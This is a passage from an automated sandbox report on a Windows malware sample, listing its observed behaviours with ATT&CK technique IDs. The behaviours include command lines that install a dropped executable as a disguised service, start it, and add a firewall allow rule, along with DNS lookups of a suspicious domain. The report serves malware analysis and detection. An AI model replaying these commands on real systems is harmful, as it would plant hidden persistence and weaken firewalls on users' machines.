\"%WINDIR%\\system32\\qmuelfhl\\jwifylqa.exe /d\\\"C:\\9e6e248d1fb56d18df4ae8b8b6\" - (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description qmuelfhl \"wifi internet conection\"\" - (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start qmuelfhl\" - (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00002632)\n \"jwifylqa.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00003564)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75BD0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75BD0000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75BD0000\n \"jwifylqa.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75BD0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75BD0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75BD0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called \"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 00000000-00005312)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\jwifylqa.exe\" %WINDIR%\\\\system32\\\\qmuelfhl\\\\\" (UID: 00000000-00004684)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\qmuelfhl\\\\\" (UID: 00000000-00003100)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\jwifylqa.exe\" %WINDIR%\\\\system32\\\\qmuelfhl\\\\\" (UID: 00000000-00004684)\n Spawned process \"sc.exe\" with commandline \"create qmuelfhl binPath= \"%WINDIR%\\\\system32\\\\qmuelfhl\\\\jwifylqa ...\" (UID: 00000000-00002932), Spawned process \"sc.exe\" with commandline \"description qmuelfhl \"wifi internet conection\"\" (UID: 00000000-00002356), Spawned process \"sc.exe\" with commandline \"start qmuelfhl\" (UID: 00000000-00001072), Spawned process \"jwifylqa.exe\" with commandline \"/d\"C:\\\\9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8 ...\" (UID: 00000000-00003564)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00005392), Spawned process \"svchost.exe\" (UID: 00000000-00005312)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\qmuelfhl\\\\\" (UID: 00000000-00003100)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\jwifylqa.exe\" %WINDIR%\\\\system32\\\\qmuelfhl\\\\\" (UID: 00000000-00004684)\n Spawned process \"sc.exe\" with commandline \"create qmuelfhl binPath= \"%WINDIR%\\\\system32\\\\qmuelfhl\\\\jwifylqa ...\" (UID: 00000000-00002932), Spawned process \"sc.exe\" with commandline \"description qmuelfhl \"wifi internet conection\"\" (UID: 00000000-00002356), Spawned process \"sc.exe\" with commandline \"start qmuelfhl\" (UID: 00000000-00001072), Spawned process \"jwifylqa.exe\" with commandline \"/d\"C:\\\\9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8 ...\" (UID: 00000000-00003564)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00005392), Spawned process \"svchost.exe\" (UID: 00000000-00005312)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"\n \"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"jwifylqa.exe\" (UID: 00000000-00003564) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"jwifylqa.exe\" (UID: 00000000-00003564) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00005392) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00005392) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00005312) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00005312) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"jwifylqa.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"jwifylqa.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"jwifylqa.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"\n \"microsoft.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d\" has an executable section named \".text\"\n \"jwifylqa.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d\" has an writable section named \".data\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d\" has an writable section named \".text\"\n \"jwifylqa.exe\" has an writable section named \".data\"\n \"jwifylqa.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xbe7000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xde7000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"jwifylqa.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d\" was detected as \"VC8 -> Microsoft Corporation\"\n \"jwifylqa.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"jwifylqa.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\jwifylqa.exe]- [targetUID: 00000000-00002632]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"jwifylqa.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" reads file \"c:\\9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe.Local\\\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\9E6E248D1FB56D18DF4AE8B8B6F2DDD7161CF848897D3D5A26A9324C8851323D.EXE.LOCAL\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" 